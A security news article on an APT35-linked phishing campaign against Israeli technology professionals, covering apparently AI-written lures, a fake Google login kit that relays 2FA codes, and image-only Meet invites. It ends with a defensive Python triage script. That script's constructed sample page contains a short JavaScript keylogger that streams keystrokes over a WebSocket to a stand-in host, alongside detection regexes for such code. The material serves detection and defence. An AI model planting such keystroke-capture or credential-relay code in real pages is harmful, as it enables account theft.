Iranian APT35 Group Launches AI-Driven Phishing Campaigns Against Israeli Technology Specialists


According to a recent report from a cybersecurity firm, some Israeli tech and cybersecurity professionals were contacted by attackers pretending to be assistants to technology executives or academic researchers. These approaches came via both email and WhatsApp messages. Victims who responded were led to counterfeit Google login pages or fake Google Meet invites.

This campaign has been attributed to a threat group tracked as Educated Manticore, whose activity overlaps with clusters that other vendors track under names such as APT35, the closely related APT42, Charming Kitten, ITG18, Mint Sandstorm, and TA453.

This advanced persistent threat group is known for carrying out sophisticated social engineering campaigns, often using fake identities on platforms like LinkedIn and Facebook to convince targets to download malicious software.

The cybersecurity firm observed a surge in these phishing attempts beginning in mid-June 2025, coinciding with the escalation of the conflict between Iran and Israel. The attackers sent personalized messages by email and WhatsApp, often framed as meeting requests. Their polished structure and the absence of the spelling and grammar mistakes that have historically given such lures away led the firm to assess that they were probably drafted with AI tools.

In one notable WhatsApp message, the attackers leveraged the ongoing conflict to persuade the recipient to join a meeting. The pretense was a request for immediate help in developing an AI-powered system to detect cyber threats that had been increasing since June 12.

Initially these messages, as in earlier Charming Kitten operations, contained no malicious link or attachment and served only to build rapport. Once the target was engaged in conversation, the attackers moved to the next stage and sent links to fraudulent login pages built to harvest Google credentials.

Before sending the link, they asked the target for their email address, which was then pre-filled on the fake login page. Google's real sign-in flow shows a known address on the password step, so the pre-fill makes the counterfeit page feel familiar and removes one prompt at which the target might have paused.

The phishing toolkit behind these pages mimics the authentic login interface, but is built as a React-based single-page application (SPA) rather than as static HTML: the transitions between the email, password and verification-code screens are handled by client-side routing, and captured input is pushed to the attackers' server over a live WebSocket connection instead of a conventional form submission. Because the real content is assembled at runtime from a bundled script, a scanner that simply fetches the page sees an almost empty document, which makes signature-based detection harder.

These fake pages do not only steal usernames and passwords; they also prompt for the victim's two-factor authentication (2FA) code, so SMS and authenticator-app codes reach the attackers in time to be used before they expire. Codes of that kind are not bound to the site they are typed into, which is why this works; phishing-resistant methods such as FIDO2 security keys or passkeys, whose response is tied to the real origin, are not defeated by it. The toolkit also includes a silent keylogger that records every keystroke as it is typed, so even a partially entered password from an abandoned login attempt is captured.

The fake Google Meet invitations use a related trick: the page, hosted on a plausible-looking domain, is essentially a static screenshot of a Meet call rather than a working interface. Clicking anywhere on the image redirects the user to the phishing site, which then begins harvesting credentials.
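As an added example (not the security firm's code and not the attackers' kit), the following Python script triages a saved page and its URL for the traits described in the preceding paragraphs: Google branding on a non-Google origin, a victim email pre-filled through the URL or the markup, a WebSocket channel, keystroke listeners, an SPA shell with no static form, and an image-only Meet lure. The query-parameter names, the sample pages and the domains are constructed for illustration and are not indicators from the campaign.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The kit described above impersonates Google; treat that branding on any
# other origin as a finding. The parameter names are an assumption, not the
# kit's real ones.
GOOGLE_SUFFIX = "google.com"
PREFILL_PARAMS = ("email", "login_hint", "user", "u")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def is_google_origin(host: str) -> bool:
    host = host.lower()
    return host == GOOGLE_SUFFIX or host.endswith("." + GOOGLE_SUFFIX)


def visible_text(html: str) -> str:
    """Text a user would actually see: drop script/style blocks, then tags."""
    no_code = re.sub(r"<(script|style)\b.*?</\1\s*>", " ", html, flags=re.S | re.I)
    return re.sub(r"\s+", " ", re.sub(r"<[^>]+>", " ", no_code)).strip()


def triage(url: str, html: str) -> dict:
    """Score one saved page against the traits of the kit described above."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    low = html.lower()
    query = parse_qs(parts.query)

    findings = {
        # Google branding served from a non-Google origin.
        "brand_on_foreign_origin":
            "google" in low and not is_google_origin(host),
        # The victim's address arrives in the URL or is baked into the page:
        # the "ask for the email in chat, then pre-fill it" trick.
        "prefilled_email":
            any(EMAIL_RE.search(v) for p in PREFILL_PARAMS for v in query.get(p, []))
            or bool(re.search(r"value\s*=\s*[\"']" + EMAIL_RE.pattern, html)),
        # A live WebSocket instead of a form POST for shipping input out.
        "websocket_channel":
            bool(re.search(r"new\s+WebSocket\s*\(\s*[\"']wss?://", html)),
        # Keystroke listeners: the silent keylogger.
        "keystroke_capture":
            bool(re.search(r"addEventListener\s*\(\s*[\"'](keydown|keyup|keypress|input)[\"']", html))
            or bool(re.search(r"\bonkey(down|up|press)\s*=", low)),
        # SPA shell: an empty mount point and no static <form>, so a plain
        # fetch of the page shows almost nothing of the login flow.
        "spa_shell":
            bool(re.search(r"<div[^>]+id=[\"'](root|app)[\"']", low)) and "<form" not in low,
        # Meet-style lure: one clickable image and almost no real text.
        "image_lure":
            bool(re.search(r"<(a\b[^>]*href[^>]*>\s*<img|img\b[^>]*onclick|body\b[^>]*onclick)", low))
            and len(visible_text(html)) < 40,
    }
    return {"host": host, "findings": findings, "score": sum(findings.values())}


# Constructed sample pages (not real captures) covering three cases.
FAKE_LOGIN_URL = "https://accounts-meet-verify.example/signin?email=target%40example.org"
FAKE_LOGIN_HTML = """<!doctype html><html><head><title>Sign in - Google Accounts</title></head>
<body><div id="root"></div><script src="/static/js/main.8f3a2c.js"></script>
<script>
const ws = new WebSocket("wss://accounts-meet-verify.example/sync");
document.addEventListener("keydown", e => ws.send(JSON.stringify({k: e.key, t: Date.now()})));
</script></body></html>"""

MEET_LURE_URL = "https://meet-invite.example/j/abc-defg-hij"
MEET_LURE_HTML = """<html><body style="margin:0">
<a href="https://accounts-meet-verify.example/signin"><img src="meet.png" alt="Google Meet" style="width:100%"></a>
</body></html>"""

REAL_LOGIN_URL = "https://accounts.google.com/v3/signin/identifier"
REAL_LOGIN_HTML = """<html><body><form method="post" action="/signin">
<input type="email" name="identifier"><button>Next</button></form></body></html>"""

if __name__ == "__main__":
    for url, page in ((FAKE_LOGIN_URL, FAKE_LOGIN_HTML),
                      (MEET_LURE_URL, MEET_LURE_HTML),
                      (REAL_LOGIN_URL, REAL_LOGIN_HTML)):
        r = triage(url, page)
        print(f"{r['host']}: score {r['score']}", [k for k, v in r["findings"].items() if v])
```

The checks are deliberately crude string and regex heuristics over the page as fetched; a kit that loads its WebSocket and keystroke code from a separate bundle will only trip `spa_shell` and `brand_on_foreign_origin` until the bundle itself is fetched and fed through the same function. The origin check matters most: any Google sign-in form whose hostname is not `google.com` or a subdomain of it is wrong regardless of how convincing the page looks.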

The security firm emphasized that Educated Manticore remains a serious and persistent threat, especially amid the intensified conflict with Israel. The group is noted for its aggressive phishing methods, its rapid setup and teardown of malicious infrastructure, and its ability to adapt quickly to countermeasures.
